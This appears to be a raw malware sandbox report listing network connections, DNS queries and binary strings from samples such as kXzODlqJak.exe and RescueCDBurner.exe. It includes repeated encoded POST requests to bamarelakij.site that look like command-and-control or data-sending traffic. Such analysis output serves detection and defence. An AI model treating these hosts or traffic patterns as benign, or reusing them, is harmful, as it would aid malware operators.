Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 68959Host: bamarelakij.site
Source: global trafficHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36p: B5smxlJLNo14xsxDJtIvbZCH8YEContent-Length: 35Host: bamarelakij.site
Source: global trafficHTTP traffic detected: OPTIONS /api/report?cat=msn HTTP/1.1Host: deff.nelreports.netConnection: keep-aliveOrigin: https://assets.msn.comAccess-Control-Request-Method: POSTAccess-Control-Request-Headers: content-typeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: POST /api/report?cat=msn HTTP/1.1Host: deff.nelreports.netConnection: keep-aliveContent-Length: 485Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.226
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.190.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.190.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.190.91
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.190.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.190.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.190.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.190.91
Source: unknownTCP traffic detected without corresponding DNS query: 184.28.190.91
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.203
Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
Source: unknownTCP traffic detected without corresponding DNS query: 3.171.139.32
Source: unknownTCP traffic detected without corresponding DNS query: 3.171.139.32
Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
Source: unknownTCP traffic detected without corresponding DNS query: 3.171.139.32
Source: unknownTCP traffic detected without corresponding DNS query: 3.171.139.32
Source: unknownTCP traffic detected without corresponding DNS query: 3.171.139.32
Source: unknownTCP traffic detected without corresponding DNS query: 3.171.139.32
Source: unknownTCP traffic detected without corresponding DNS query: 3.171.139.32
Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
Source: unknownTCP traffic detected without corresponding DNS query: 3.171.139.32
Source: unknownTCP traffic detected without corresponding DNS query: 3.171.139.32
Source: unknownTCP traffic detected without corresponding DNS query: 3.171.139.32
Source: unknownTCP traffic detected without corresponding DNS query: 13.89.178.27
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exeCode function: 2_2_6D093DAF HttpQueryInfoW,HttpQueryInfoW,HttpQueryInfoW,GetLastError,_memmove,_memmove,InternetReadFile,2_2_6D093DAF
Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b?rn=1736430943705&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0196AA9642C66D0E1944BFF943A46C22&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /b2?rn=1736430943705&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0196AA9642C66D0E1944BFF943A46C22&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1BB0012d778c190819b9e701736430946; XID=1BB0012d778c190819b9e701736430946
Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 7.1sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 250sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z; USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; MUIDB=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=5f98fa1c-3184-4abd-971b-0ba246537bf7; ai_session=nz8yh1TyTd8zxc9wX2nCTq|1736430943700|1736430943700; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z
Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":15,"imageId":"BB1msyCI","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z; USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; MUIDB=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=5f98fa1c-3184-4abd-971b-0ba246537bf7; ai_session=nz8yh1TyTd8zxc9wX2nCTq|1736430943700|1736430943700; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=91BAB7003B9E458FA0272F5F799DB4AC.RefC=2025-01-09T13:55:38Z
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1736430943704&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=91bab7003b9e458fa0272f5f799db4ac&activityId=91bab7003b9e458fa0272f5f799db4ac&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F3117EF083974E1AAB9B33D6E377E4FB&MUID=0196AA9642C66D0E1944BFF943A46C22 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=0196AA9642C66D0E1944BFF943A46C22; _EDGE_S=F=1&SID=3EC1495D869364F43BD45C3287A26513; _EDGE_V=1; SM=T
Source: RescueCDBurner.exe, 00000004.00000002.1587922968.000000006B2D9000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: B,kQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148*.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c*.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
Source: RescueCDBurner.exe, 00000003.00000002.1525753146.000000006C489000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: BGlQLocalSocketPrivate::completeAsyncReadQLocalSocketPrivate::startAsyncReadQLocalSocket::waitForReadyRead WaitForSingleObject failed with error code %d.\\.\pipe\QLocalSocket::connectToServer%1: %2QLocalServerPrivate::addListener1_q_onNewConnection()QLocalServerPrivate::_q_onNewConnectione-islem.kktcmerkezbankasi.org2148*.EGO.GOV.TR2087MD5 Collisions Inc. (http://www.phreedom.org/md5)41UTN-USERFirst-Hardware72:03:21:05:c5:0c:08:57:3d:8e:a5:30:4e:fe:e8:b0Digisign Server ID - (Enrich)1276011370Digisign Server ID (Enrich)12000170511846442971184640175DigiNotar Public CA 20251e:7d:7a:53:3d:45:30:41:96:40:0f:71:48:1f:45:04DigiNotar Extended Validation CAd6:d0:29:77:f1:49:fd:1a:83:f2:b9:ea:94:8c:5c:b4DigiNotar PKIoverheid CA Organisatie - G220001983DigiNotar PKIoverheid CA Overheid en Bedrijven20015536120000515120000505DigiNotar Cyber CA1200005251184640176DigiNotar Qualified CA5b:d5:60:9c:64:17:68:cf:21:0e:35:fd:fb:05:ad:41CertiID Enterprise Certificate Authoritya4:b6:ce:e3:2e:d3:35:46:26:3c:b3:55:3a:a8:92:21DigiNotar Root CA G20a:82:bd:1e:14:4e:88:14:d7:5b:1a:55:27:be:bf:3eDigiNotar Services 1024 CA36:16:71:55:43:42:1b:9d:e6:cb:a3:64:41:df:24:38DigiNotar Services CAf1:4a:13:f4:87:2b:56:dc:39:df:84:ca:7a:a1:06:49DigiNotar Root CA0c:76:da:9c:91:0c:4e:2c:9e:fe:15:d0:58:93:3c:4c*.google.com05:e2:e6:a4:cd:09:ea:54:d6:65:b0:75:fe:22:a2:56global trusteed8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0login.live.comb0:b7:13:3e:d0:96:f9:b5:6f:ae:91:c8:74:bd:3a:c0addons.mozilla.org92:39:d5:34:8f:40:d1:69:5a:74:54:70:e1:f2:3f:43login.skype.come9:02:8b:95:78:e4:15:dc:1a:71:0a:2b:88:15:44:473e:75:ce:d4:6b:69:30:21:21:88:30:ae:86:a8:2a:7139:2a:43:4f:0e:07:df:1f:8a:a3:05:de:34:e0:c2:29login.yahoo.comd7:55:8f:da:f5:f1:10:5b:b2:13:28:2b:70:77:29:a3www.google.comf5:c8:6a:f3:61:62:f1:3a:64:f5:4f:6d:c9:58:7c:06mail.google.com04:7e:cb:e9:fc:a5:5f:7b:d0:9e:ae:36:e1:0c:ae:1eSTOULCNOStateOrProvinceNameOrganizationalUnitNameLocalityNameCountryNameCommonNameOrganizationQMap(-----END CERTIFICATE----- equals www.yahoo.com (Yahoo)
Source: global trafficDNS traffic detected: DNS query: bamarelakij.site
Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global trafficDNS traffic detected: DNS query: assets.msn.com
Source: global trafficDNS traffic detected: DNS query: c.msn.com
Source: global trafficDNS traffic detected: DNS query: api.msn.com
Source: global trafficDNS traffic detected: DNS query: assets2.msn.com
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
Source: unknownHTTP traffic detected: POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36Content-Length: 147Host: bamarelakij.site
Source: kXzODlqJak.exeString found in binary or memory: http://appsyndication.org/2006/appsyn
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://b.chenall.net/menu.lst
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://bug.reneelab.com
Source: RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003User
Source: RescueCDBurner.exe, 00000003.00000002.1525753146.000000006C489000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1587922968.000000006B2D9000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://bugreports.qt-project.org/
Source: RescueCDBurner.exe, 00000003.00000002.1525753146.000000006C489000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1587922968.000000006B2D9000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2493466621.000000000817F000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2491756701.000000000802C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2528724292.0000000008163000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RescueCDBurner.exe, 00000003.00000002.1524468148.0000000009FD0000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1585655329.0000000009C69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851555439.00000000054B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalG3CodeSigningECCSHA3842021CA1.crl0N
